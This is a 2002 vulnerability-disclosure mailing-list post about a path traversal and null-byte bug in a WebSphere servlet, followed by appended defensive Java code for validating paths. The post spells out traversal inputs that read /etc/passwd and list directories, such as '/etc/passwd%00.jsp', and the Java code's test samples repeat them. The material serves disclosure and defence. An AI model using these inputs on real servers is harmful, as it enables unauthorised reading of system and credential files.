Vulnerability Development mailing list archives

Where does the hole lie?


From: Steve Maks <smaks () verisign com>
Date: Thu, 18 Apr 2002 18:32:59 -0500

While pen-testing a client's webserver with WebSphere in place, I came
across a bug and I'm not sure whether the servlet is to blame or rather some
part of WebSphere.  The case is this:

After authenticating to the site, the user is sent to
http://site/servlet/App?target=/index.jsp.  If you change the target and ../
your way back up and then down again, accessing a file that exists such as
/etc/passwd gives the following error:

Error 403
An error has occured while processing request:http://site/ErrorReporter
Message: File not found: /../../../../../../etc/passwd

Target Servlet: file
StackTrace: 
--------------------------------------------------------------------------------
Root Error-1: File not found: /../../../../../../etc/passwd
com.ibm.servlet.engine.webapp.WebAppErrorReport: File not found: /../../../../../../etc/passwd
--snip--

If I give it something that doesn't exist, such as /etc/passw, I get your
standard 404.  However, if I use the poison null byte trick and request
/etc/passwd%00.jsp (only works with the .jsp extension), I receive my file.
Consequently, a /etc%00.jsp and doing a view source will let me browse
directories.

My instinct is that this happens because the servlet doesn't check for a
null byte in the string, but I thought it was worthwhile to mention.  Thanks
for any input.

Steve
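
A defensive check for a request parameter like `target`, added here as an example; it is not part of the original post and not the application's or WebSphere's code. The class name `TargetResolver`, the web root directory and the `.jsp`-only allow-list are assumptions made for illustration.

```java
import java.io.FileNotFoundException;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

public class TargetResolver {
    private final Path webRoot;   // assumed document root, not from the post
    public TargetResolver(Path webRoot) throws IOException {
        this.webRoot = webRoot.toRealPath();   // resolve symlinks once
    }

    /** Maps a request "target" value to a file under webRoot or throws. */
    public Path resolve(String target) throws IOException {
        if (target == null || target.isEmpty())
            throw new SecurityException("empty target");
        // Refuse NUL and other control characters before any path handling, so
        // the string checked here is the same string the filesystem API sees.
        for (int i = 0; i < target.length(); i++)
            if (Character.isISOControl(target.charAt(i)))
                throw new SecurityException("control character in target");
        // Treat the value as relative to the web root, then collapse "../".
        String relative = target.replace('\\', '/').replaceAll("^/+", "");
        Path candidate = webRoot.resolve(relative).normalize();
        if (!candidate.startsWith(webRoot))
            throw new SecurityException("target escapes web root");
        if (!Files.isRegularFile(candidate))
            throw new FileNotFoundException("no such resource");
        // Re-check after symlink resolution, and test the extension on the
        // resolved name rather than on the raw request string.
        Path real = candidate.toRealPath();
        if (!real.startsWith(webRoot) || !real.getFileName().toString().endsWith(".jsp"))
            throw new SecurityException("target not allowed");
        return real;
    }

    public static void main(String[] args) throws IOException {
        Path root = Files.createTempDirectory("webroot");   // constructed sample
        Files.write(root.resolve("index.jsp"), "ok".getBytes());
        TargetResolver r = new TargetResolver(root);
        String[] samples = { "/index.jsp", "/../../../../../../etc/passwd",
                "/../../../../../../etc/passwd\0.jsp", "/etc\0.jsp" };
        for (String s : samples) {
            String verdict;
            try { r.resolve(s); verdict = "ALLOW"; }
            catch (SecurityException | IOException e) { verdict = "DENY (" + e.getMessage() + ")"; }
            System.out.println(s.replace("\0", "%00") + " -> " + verdict);
        }
    }
}
```

The exception messages leave out the requested path, so an error page built from them does not echo the resolved filename back to the client.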



